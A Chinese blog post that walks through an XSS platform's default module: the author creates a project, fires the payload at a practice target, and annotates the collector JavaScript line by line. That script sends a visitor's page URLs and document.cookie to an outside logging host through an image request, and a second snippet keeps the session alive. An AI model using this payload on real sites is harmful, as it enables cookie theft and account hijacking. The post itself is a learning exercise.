xss平台模块代码分析--默认模块

最新推荐文章于 2024-05-11 21:35:53 发布
最新推荐文章于 2024-05-11 21:35:53 发布
阅读量1.4k 收藏 2
点赞数 2
文章标签: XSS攻击 XSS防御 XSS剖析 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ewige/article/details/107081785
版权

这里写目录标题

攻击实列

1. 首先创建一个模块

在这里插入图片描述

在这里插入图片描述
首次分析,就只选用一个模块,点击下方下一步后。
项目已经创建完毕,下方也有详细的使用教程。
在这里插入图片描述

2.先进行使用看下效果。
就使用第一个payload,很明显该payload是访问**//xsshs.cn/F6uJ**这个网址,

//xsshs.cn/F6uJ此方式书写会自动根据网站选择http,还是https

在这里插入图片描述

我们打开这个网址,发现就是上方的代码
在这里插入图片描述

因此,我们的目标就是,让目标网页访问我们的链接,
靶场测试

在这里插入图片描述

成功获取

在这里插入图片描述

代码分析

对代码进行整理后

(function () {
     //escape() 对符号(空格,标点...),中文进行编码
    (new Image()).src = 'https://xsshs.cn/xss.php?do=api&id=wIV7&location=' + escape((function () {
        //try  catch  异常处理
        try {
        	// document.location.href 获取目标的来源地址
            return document.location.href
        } catch (e) {
            return ''
        }
    })()) + '&toplocation=' + escape((function () {
        try {
            //top.location.href 控制框架页面跳转
            return top.location.href
        } catch (e) {
            return ''
        }
    })()) + '&cookie=' + escape((function () {
        try {
            //document.cookie  获取cookie
            return document.cookie
        } catch (e) {
            return ''
        }
    })()) + '&opener=' + escape((function () {
        try {
            //&&与操作
            //三元表达式 (判别式) ? (expr2) : (expr3)
            //如果判别式为真则之为expr2  反之为  expr3
            return (window.opener && window.opener.location.href) ? window.opener.location.href : ''
        } catch (e) {
            return ''
        }
    })());
})();
//一直没看明白,这一步的作用,,,
if ('' == 1) {
    keep = new Image();
    keep.src = 'https://xsshs.cn/xss.php?do=keepsession&id=wIV7&url=' + escape(document.location) + '&cookie=' + escape(document.cookie)
};

立即执行函数
话说这是什么写法呢?
在这里插入图片描述

  //立即执行函数:不需要调用立即执行
        //有两种写法

        //1.法一  (function(){})()
        //例子:
        (function (a, b) {
            console.log(a + b);
        })(1, 2); //第二个小括号可以看作是调用函数

        //法二  (function(){}())
        //例子:
        (function (c, d) {
            console.log(c + d)
        }(3, 4));
        //立即执行函数最大的作用就是,独立创建了一个作用域,里面的所有变量都是局部变量不会有命名冲突

怎样获得公网IP的呢?

因为我们嵌入的是一个网址,当目标访问时是以公网ip访问的xss平台就可以记录器公网IP了。

关键函数解释:
Image(); 传送门
escape:传送门
document.location:传送门
top.location:传送门
document.cookie:传送门

岚铭
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
XSS平台源码(xsser.me)
12-27
XSS平台源码(xsser.me)
XSS测试平台源码——免费分享
sGanYu
08-09 2614
链接:https://pan.baidu.com/s/1Zfle6JsQUpukjiJFK7VoFg 提取码:ggyy
2024年网络安全最全【XSS平台】使用,简单 payload 项目的创建(1),分享一点面试小经验
最新发布
2401_84301948的博客
05-11 447
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
XSS平台代码,最新版本。适合自己部署
03-26
XSS平台代码,最新版本。适合自己部署,有喜欢信息安全的小伙伴可以一起沟通交流。
XSS平台bxss源码
03-17
XSS平台bxss源码
最新完善版XSS平台源码 【40多个模块】,xss源码下载,PHP
03-26
最新完善版XSS平台源码 【40多个模块
最新完善版XSS平台源码.zip
11-08
在CSDN上找了好多都是收费好贵的XSS平台源码,为了不让大家损失过多的币,忍痛把自己的源码分享低价给大家用。...里面只有个默认模块,那些Xss注入语句模块是需要大家自己去找的。放心绝对纯净无后门
lucy-xss-filter
04-30
Lucy-XSSXssFilter,XssPreventer Lucy-XSS是一个包含两个防御模块的开源库,用于保护Web应用程序免受XSS攻击。 它支持基于白名单规则的安全策略。 当前的默认规则是Naver的标准。 您可以根据需要更改默认规则。...
cwp-core:CWP基本兼容性模块
05-04
模块包括通用Web平台站点正常运行所需的核心配置。 配置 根据要求,可以在此模块中修改一些设置。 这些在下面列出。 XSS保护 默认情况下,CWP网站会指示较新的浏览器防御跨站点脚本(XSS)攻击。 这是使用HTTP标头...
thymeleaf-joda:Thymeleaf - Joda 集成模块
07-12
模块提供了一种名为nl.eveoh.thymeleaf.joda.dialect.JodaDialect的新方言,默认前缀为joda 。 这包括: 新的表达式实用程序对象: #joda :一个表达式实用程序对象,具有用于创建、比较和格式化 Joda 时间的方法...
covalent-highlight-nightly:每晚构建的https
05-10
注意:此模块使用DomSanitizer服务来消毒从highlight.js库解析的html ,以避免XSS问题。 默认情况下,-- --dev build将在控制台中记录以下消息,以使您知道: WARNING: sanitizing HTML stripped some content (see...
XSS脚本攻击使用方法初级教程
11-27
XSS跨站攻击介绍,解释XSS是如何进行攻击的以及执行攻击的实例
xss源码(常用站源码附安装教程).rar
03-10
一份比较齐全的XSS平台源码,里面有部署文档,需要的自取。
XSS简单防御模块
weixin_39876634的博客
02-26 148
声明:以下仅为简单尝试模块,未经测试;如要使用,还请详细斟酌。需要结合jquery使用。 模块代码 // ### protect.js ### /** * @desc 防止XSS攻击 * @date 2020-02-25 * @author Chang-Jin */ function Protect() { var hex = new Array('0', '1', '2', ...
XSS的原理分析与解剖
m0_51313985的博客
05-22 372
什么是XSS? XSS可以理解为前端代码注入(前端代码包括HTML,CSS,JavaScript) 注入攻击的本质,是把用户输入的数据当做代码执行。 这里有两个关键条件: 第一个是用户能够控制输入 第二个是原本程序要执行的代码,拼接了用户输入的数据 那么XSS主要拼接的是什么? SQL注入拼接的是操作数据库的SQL语句。 XSS拼接的是网页的HTML代码,一般而言我们是可以拼接合适的HTML代码去执行恶意的JS语句(总结: xss就是拼接恶意的HTML) XSS能做什么? 盗取Cookie(用的最频繁的)
xss平台搭建(使用xsser.me源码)
热门推荐
blrk
06-24 2万+
需要修改的地方比较多,目前已基本可用,还在学习摸索中。。。 1、将xssplatform.sql中的xsser.me/修改为实际使用的URL,如localhost:6666/xss/ 2、修改themes\default\templates\register.html中的提交按钮的源码为: 行53 修改为 3、邀请码的生成 (1)将文件source\user.p
一个xss利用平台
weixin_30444105的博客
04-29 64
这是一个project里面收到的cookies 这是设置,支持keep session和用户自定义js 自带测试代码部分 使用python + django,部署0难度。 代码在这里: https://github.com/virusdefender/xsser 转载于:https://www.cnblogs.co...
(26)【xss环境搭建一条龙】【pm、bf使用】轻量xss平台、Postman、beef-xss功能模块利用
03-27 3503
xss平台(无数据库)、postman使用、beef使用
前端安全之XSS攻击
weixin_34381666的博客
02-18 1140
XSS(cross-site scripting跨域脚本攻击)攻击是最常见的Web攻击,其重点是“跨域”和“客户端执行”。有人将XSS攻击分为三种,分别是: 1. Reflected XSS(基于反射的XSS攻击) 2. Stored XSS(基于存储的XSS攻击) 3. DOM-based or local XSS(基于DOM或本地的XSS攻击) Reflected XSS 基于反射的...
nginx 安全配置代码 X-Frame-Options、X-XSS-Protection、X-Content-Type-Options
09-02
当配置 Nginx 的安全选项时,你可以使用以下代码来设置 X-Frame-Options、X-XSS-Protection 和 X-Content-Type-Options: ``` server { ... # 配置 X-Frame-Options add_header X-Frame-Options SAMEORIGIN; ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值